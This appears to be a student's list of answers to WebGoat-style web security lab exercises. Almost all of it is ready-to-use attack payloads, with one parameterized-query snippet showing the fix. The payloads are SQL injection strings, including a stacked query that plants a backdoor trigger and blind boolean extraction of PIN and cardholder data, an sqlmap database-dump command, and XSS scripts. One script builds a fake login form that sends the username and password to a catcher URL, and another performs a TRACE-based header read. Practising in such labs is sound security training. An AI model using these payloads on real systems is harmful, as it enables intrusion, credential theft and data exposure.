- Smith' OR 1 = 1 or last_name = 'bla
- smith' OR '1' = '1
- String query = "SELECT * FROM employee WHERE userid = ? and password = ?"; // constant SQL text; the two ? placeholders keep caller-supplied values out of the statement itself
- try
- {
- Connection connection = WebSession.getConnections(s);
- PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); // statement is prepared from the fixed text above; result set is scrollable and read-only
- statement.setString(1, userId); // bound as a string value for the first ?, so quote characters in userId stay data and cannot change the query
- statement.setString(2, password); // bound for the second ?; NOTE(review): password is compared directly in SQL, presumably stored unhashed; confirm
- ResultSet answer_results = statement.executeQuery(); // NOTE(review): the fragment ends here; closing of the try block, statement and result set is not shown
- 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid
- 101 and ((SELECT pin from pins where cc_number='1111222233334444') > 1000);
- 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'K' );
- 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'j' );
- 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'm' );
- 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'm' );
- In other words: Jill
- sqlmap -u "http://192.168.56.1:8080/search.php?what=1&search=search" --dump -D bookshop -T account
- </form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Get rekt skrub");} </script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
- <script>alert("rekt");</script>
- <script>alert("Dangerous");</script>
- <script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script>
- <script>alert('Bang!')</script>
- <script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>"); document.write(str1);}</script>